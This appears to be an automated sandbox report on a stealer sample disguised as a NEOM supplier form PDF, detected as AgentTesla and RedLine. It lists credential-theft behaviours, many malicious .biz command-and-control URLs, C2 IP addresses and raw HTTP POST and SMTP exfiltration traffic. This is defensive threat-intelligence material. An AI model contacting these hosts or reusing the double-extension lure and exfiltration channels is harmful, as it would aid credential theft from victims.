Windows Analysis Report
NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE

Overview

General Information

Sample name: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE
Analysis ID: 1505544
MD5: b3f46ad365e186080ca18bcec6437be9
SHA1: 3c0b8f485cce7ab2a439f72f12a8eb15e5a9a1b8
SHA256: 42d6efd448aaa7f28f8801a8dc83d91d30b5a7a1c3b9566f82e1348b1c98f1cc
Infos:

Detection

AgentTesla, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected AgentTesla
Yara detected RedLine Stealer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Connects to many different domains
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Executes massive DNS lookups (> 100)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pywolwnvd.biz/ibmog Avira URL Cloud: Label: malware
Source: http://ssbzmoy.biz/gadlqtcclo Avira URL Cloud: Label: malware
Source: http://przvgke.biz/ocfuav Avira URL Cloud: Label: malware
Source: http://npukfztj.biz/avqaqcipoasdlbgl Avira URL Cloud: Label: malware
Source: http://cvgrf.biz/rioeg Avira URL Cloud: Label: malware
Source: http://knjghuig.biz/qvtcyxjgqcewj Avira URL Cloud: Label: malware
Source: http://ssbzmoy.biz/qlyvjmdwxl Avira URL Cloud: Label: malware
Source: http://npukfztj.biz/hshnlfiqt Avira URL Cloud: Label: malware
Source: http://pywolwnvd.biz/dafjrbte Avira URL Cloud: Label: malware
Source: http://lpuegx.biz/qjnvredjkanikntw Avira URL Cloud: Label: phishing
Source: http://przvgke.biz/hea Avira URL Cloud: Label: malware
Source: http://lpuegx.biz/wqlih Avira URL Cloud: Label: phishing
Source: http://mnjmhp.biz/mtnqoxhnqxwi Avira URL Cloud: Label: malware
Source: http://dlynankz.biz/oyataqebqvq Avira URL Cloud: Label: malware
Source: http://typgfhb.biz/rqdnnkaqeymsqe Avira URL Cloud: Label: malware
Source: http://vyome.biz/bpkaqfdvy Avira URL Cloud: Label: malware
Source: http://qaynky.biz/soubumgu Avira URL Cloud: Label: malware
Source: http://vrrazpdh.biz/jjv Avira URL Cloud: Label: malware
Source: http://nqwjmb.biz/aawflokdkaaso Avira URL Cloud: Label: malware
Source: http://oshhkdluh.biz/b Avira URL Cloud: Label: malware
Source: http://yunalwv.biz/ieibbbqqgmrvhkh Avira URL Cloud: Label: malware
Source: http://fwiwk.biz/ful Avira URL Cloud: Label: malware
Source: http://gnqgo.biz/orioms Avira URL Cloud: Label: malware
Source: http://dwrqljrr.biz/pgm Avira URL Cloud: Label: malware
Source: http://tbjrpv.biz/iou Avira URL Cloud: Label: malware
Source: http://ftxlah.biz/jxjcyhijmgghr Avira URL Cloud: Label: malware
Source: http://brsua.biz/d Avira URL Cloud: Label: malware
Source: http://ytctnunms.biz/hysug Avira URL Cloud: Label: malware
Source: http://fwiwk.biz/l Avira URL Cloud: Label: malware
Source: http://iuzpxe.biz/kybt Avira URL Cloud: Label: malware
Source: http://deoci.biz/kyvgodg Avira URL Cloud: Label: malware
Source: http://jpskm.biz/gjwgeffxixqbuh Avira URL Cloud: Label: malware
Source: http://yauexmxk.biz/afqnwtrkmt Avira URL Cloud: Label: malware
Source: http://jhvzpcfg.biz/dx Avira URL Cloud: Label: malware
Source: http://xlfhhhm.biz/hdnypmld Avira URL Cloud: Label: malware
Source: http://vcddkls.biz/iac Avira URL Cloud: Label: malware
Source: http://ifsaia.biz/cygphrvvuwwhpqjy Avira URL Cloud: Label: malware
Source: http://qpnczch.biz/rlifsams Avira URL Cloud: Label: malware
Source: http://wllvnzb.biz/xurinfdw Avira URL Cloud: Label: malware
Source: http://acwjcqqv.biz/sucofgimje Avira URL Cloud: Label: malware
Source: http://gvijgjwkh.biz/lqycgpuam Avira URL Cloud: Label: malware
Source: http://oflybfv.biz/umdr Avira URL Cloud: Label: malware
Source: http://saytjshyf.biz/pjojuiupwn Avira URL Cloud: Label: malware
Source: http://esuzf.biz/adwycgrxdylfxl Avira URL Cloud: Label: malware
Source: http://yhqqc.biz/uilsnghvu Avira URL Cloud: Label: malware
Source: http://bumxkqgxu.biz/e Avira URL Cloud: Label: malware
Source: http://sxmiywsfv.biz/vahgcdxtf Avira URL Cloud: Label: malware
Source: http://lrxdmhrr.biz/yccyodm Avira URL Cloud: Label: malware
Source: http://yunalwv.biz/gx Avira URL Cloud: Label: malware
Source: http://pwlqfu.biz/wfktgrobq Avira URL Cloud: Label: malware
Source: http://zrlssa.biz/jmsidvkpax Avira URL Cloud: Label: malware
Source: http://ecxbwt.biz/mbcjcfmxxflkpmuo Avira URL Cloud: Label: malware
Source: http://cikivjto.biz/fnji Avira URL Cloud: Label: malware
Source: http://htwqzczce.biz/u Avira URL Cloud: Label: malware
Source: http://pectx.biz/vdswmyn Avira URL Cloud: Label: malware
Source: http://gcedd.biz/mtvhnvlftyscrey Avira URL Cloud: Label: phishing
Source: http://jlqltsjvh.biz/umjblkbuugg Avira URL Cloud: Label: malware
Source: http://rynmcq.biz/lrpwhcqxkh Avira URL Cloud: Label: malware
Source: http://warkcdu.biz/qgyptpaacdeujk Avira URL Cloud: Label: malware
Source: http://xyrgy.biz/huutba Avira URL Cloud: Label: malware
Source: http://jdhhbs.biz/bduojpmqwclgr Avira URL Cloud: Label: malware
Source: http://ecxbwt.biz/ocoeycxqebnmcofx Avira URL Cloud: Label: malware
Source: http://jwkoeoqns.biz/saunpuqsumkr Avira URL Cloud: Label: malware
Source: http://ywffr.biz/nkpyoqcnfxfvdsvg Avira URL Cloud: Label: malware
Source: http://reczwga.biz/w Avira URL Cloud: Label: malware
Source: http://fjumtfnz.biz/rvqem Avira URL Cloud: Label: malware
Source: http://ctdtgwag.biz/qmsckions Avira URL Cloud: Label: malware
Source: http://tnevuluw.biz/jpral Avira URL Cloud: Label: malware
Source: http://ocsvqjg.biz/cceha Avira URL Cloud: Label: malware
Source: http://eufxebus.biz/li Avira URL Cloud: Label: malware
Source: http://rffxu.biz/ociacchi Avira URL Cloud: Label: malware
Source: http://opowhhece.biz/ksosgyughs Avira URL Cloud: Label: malware
Source: http://wxgzshna.biz/qjjv Avira URL Cloud: Label: phishing
Source: http://kvbjaur.biz/w Avira URL Cloud: Label: malware
Source: http://uaafd.biz/cdficgkndhspr Avira URL Cloud: Label: malware
Source: http://damcprvgv.biz/ckgw Avira URL Cloud: Label: malware
Source: http://rffxu.biz/nifaqe Avira URL Cloud: Label: malware
Source: http://mgmsclkyu.biz/b Avira URL Cloud: Label: malware
Source: http://whjovd.biz/vu Avira URL Cloud: Label: malware
Source: http://bghjpy.biz/tqtlouxtvhvc Avira URL Cloud: Label: malware
Source: http://wxgzshna.biz/tp Avira URL Cloud: Label: phishing
Source: http://banwyw.biz/cfhujvjhaho Avira URL Cloud: Label: malware
Source: http://gjogvvpsf.biz/eyi Avira URL Cloud: Label: malware
Source: http://rrqafepng.biz/chtmfsmomhgtgs Avira URL Cloud: Label: malware
Source: http://htwqzczce.biz/njmokryu Avira URL Cloud: Label: malware
Source: http://hlzfuyy.biz/rngnlo Avira URL Cloud: Label: malware
Source: http://uphca.biz/ucx Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\AppVClient.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\alg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7z.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7zG.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Windows\System32\AppVClient.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\build.exe Avira: detection malicious, Label: TR/AD.RedLineSteal.dzdht
Source: C:\Windows\System32\alg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7zFM.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7z.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7zG.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7zFM.exe Avira: detection malicious, Label: W32/Infector.Gen
Multi AV Scanner detection for domain / URL
Source: pywolwnvd.biz Virustotal: Detection: 12% Perma Link
Source: npukfztj.biz Virustotal: Detection: 10% Perma Link
Source: ssbzmoy.biz Virustotal: Detection: 11% Perma Link
Source: lpuegx.biz Virustotal: Detection: 11% Perma Link
Source: cvgrf.biz Virustotal: Detection: 10% Perma Link
Source: zlenh.biz Virustotal: Detection: 10% Perma Link
Source: przvgke.biz Virustotal: Detection: 10% Perma Link
Source: knjghuig.biz Virustotal: Detection: 12% Perma Link
Source: anpmnmxo.biz Virustotal: Detection: 10% Perma Link
Source: http://ssbzmoy.biz/gadlqtcclo Virustotal: Detection: 15% Perma Link
Source: uhxqin.biz Virustotal: Detection: 10% Perma Link
Source: http://pywolwnvd.biz/ibmog Virustotal: Detection: 14% Perma Link
Source: http://przvgke.biz/ocfuav Virustotal: Detection: 9% Perma Link
Source: http://knjghuig.biz/qvtcyxjgqcewj Virustotal: Detection: 11% Perma Link
Source: http://cvgrf.biz/rioeg Virustotal: Detection: 12% Perma Link
Source: http://npukfztj.biz/avqaqcipoasdlbgl Virustotal: Detection: 14% Perma Link
Source: http://pywolwnvd.biz/dafjrbte Virustotal: Detection: 14% Perma Link
Source: http://przvgke.biz/hea Virustotal: Detection: 9% Perma Link
Source: http://npukfztj.biz/hshnlfiqt Virustotal: Detection: 13% Perma Link
Source: http://ssbzmoy.biz/qlyvjmdwxl Virustotal: Detection: 16% Perma Link
Source: http://vyome.biz/bpkaqfdvy Virustotal: Detection: 13% Perma Link
Source: http://qaynky.biz/soubumgu Virustotal: Detection: 8% Perma Link
Source: http://nqwjmb.biz/aawflokdkaaso Virustotal: Detection: 12% Perma Link
Source: http://myups.biz/sem Virustotal: Detection: 14% Perma Link
Source: http://oshhkdluh.biz/b Virustotal: Detection: 13% Perma Link
Source: http://vrrazpdh.biz/jjv Virustotal: Detection: 11% Perma Link
Source: http://fwiwk.biz/ful Virustotal: Detection: 13% Perma Link
Source: http://yunalwv.biz/ieibbbqqgmrvhkh Virustotal: Detection: 9% Perma Link
Source: http://gytujflc.biz/jtccktxedeenfqg Virustotal: Detection: 9% Perma Link
Source: http://myups.biz/vsftv Virustotal: Detection: 9% Perma Link
Source: http://gnqgo.biz/orioms Virustotal: Detection: 11% Perma Link
Source: http://dwrqljrr.biz/pgm Virustotal: Detection: 12% Perma Link
Source: http://tbjrpv.biz/iou Virustotal: Detection: 10% Perma Link
Source: http://brsua.biz/d Virustotal: Detection: 10% Perma Link
Source: http://fwiwk.biz/l Virustotal: Detection: 14% Perma Link
Source: http://yauexmxk.biz/afqnwtrkmt Virustotal: Detection: 13% Perma Link
Source: http://jhvzpcfg.biz/dx Virustotal: Detection: 8% Perma Link
Source: http://qpnczch.biz/rlifsams Virustotal: Detection: 14% Perma Link
Source: http://gvijgjwkh.biz/lqycgpuam Virustotal: Detection: 12% Perma Link
Source: http://esuzf.biz/adwycgrxdylfxl Virustotal: Detection: 10% Perma Link
Source: http://acwjcqqv.biz/sucofgimje Virustotal: Detection: 12% Perma Link
Source: http://ifsaia.biz/cygphrvvuwwhpqjy Virustotal: Detection: 10% Perma Link
Source: http://vcddkls.biz/iac Virustotal: Detection: 8% Perma Link
Source: http://saytjshyf.biz/pjojuiupwn Virustotal: Detection: 11% Perma Link
Source: http://sxmiywsfv.biz/vahgcdxtf Virustotal: Detection: 12% Perma Link
Source: http://lrxdmhrr.biz/yccyodm Virustotal: Detection: 14% Perma Link
Source: http://yunalwv.biz/gx Virustotal: Detection: 13% Perma Link
Source: http://htwqzczce.biz/u Virustotal: Detection: 13% Perma Link
Source: http://pectx.biz/vdswmyn Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\build.exe Virustotal: Detection: 89% Perma Link
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Virustotal: Detection: 63% Perma Link
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Virustotal: Detection: 73% Perma Link
Multi AV Scanner detection for submitted file
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Virustotal: Detection: 71% Perma Link
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7z.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7zG.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\build.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7zFM.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7z.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7zG.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7zFM.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 101
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.16:49716 -> 212.162.149.53:2049
Source: global traffic TCP traffic: 192.168.2.16:49720 -> 51.195.88.199:587
Executes massive DNS lookups (> 100)
Source: global traffic DNS traffic detected: number of DNS queries: 101
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.16:49720 -> 51.195.88.199:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /ibmog HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 868
Source: global traffic HTTP traffic detected: POST /lutyxpgtxicgb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gadlqtcclo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
